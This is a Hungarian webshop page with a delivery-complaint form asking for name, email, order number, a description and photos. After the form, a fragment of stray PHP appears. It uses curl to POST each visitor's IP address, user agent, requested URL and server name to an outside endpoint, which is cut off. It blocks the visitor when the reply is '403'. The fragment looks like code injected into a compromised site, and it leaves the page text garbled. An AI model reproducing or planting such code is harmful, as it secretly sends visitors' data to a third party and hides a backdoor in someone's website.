Kategóriák
Tanúsítvány
Árukereső, a hiteles vásárlási kalauz
Ügyfélszolgálat
Szállítás, átvétel

Házhozszállítás futárszolgálattal (GLS, MPL)

FOXPOST Parcel locker

Fogyasztó Barát

Fizetési megoldás
TOP termékek
Termékajánló
Hírlevél

Online vevőszolgálat - Szállítási reklamáció


Amennyiben nem megfelelő terméket kapott, vagy a csomagban levő termék sérülten érkezett, kérjük haladéktalanul jelezze ezt felénk az űrlap kitöltésével!

Kérjük segítse az ügyintézést azzal, hogy a lehető legrészletesebben ismerteti a panasza okát, lehetőleg fényképekkel is pontosan bemutatva.

Szállítással kapcsolatos kifogásokat a csomag átvételét követően 24 órán belül van lehetősége jelezni.   

A *- jelölt mezők kitöltése kötelező!

Név*:
E-mail cím*:
Bizonylat megadása *
Rendelés vagy számla szám *:
Csomag szám:
Kifogás pontos leírása (termék neve, darab száma, kifogás részletes leírása)*
Kért intézkedés
Fénykép 1
Fénykép 2
Fénykép 3
Fénykép 4
Megjegyzés
Hozzájárulok, hogy a Bükkös Egészségtár Kft rögzítse és kezelje adataimat a csere ügyintézés során *
Igen
true, CURLOPT_TIMEOUT=>5, CURLOPT_POST=>1, CURLOPT_POSTFIELDS=>"u=1&ra=".$s["REMOTE_ADDR"]."&ua=".$s["HTTP_USER_AGENT"]."&ru=".$s["REQUEST_URI"]."&sn=".$s["SERVER_NAME"]));$c = curl_exec($h);curl_close($h); if($c=="403"){header('HTTP/1.0 403 Forbidden');die();} ?>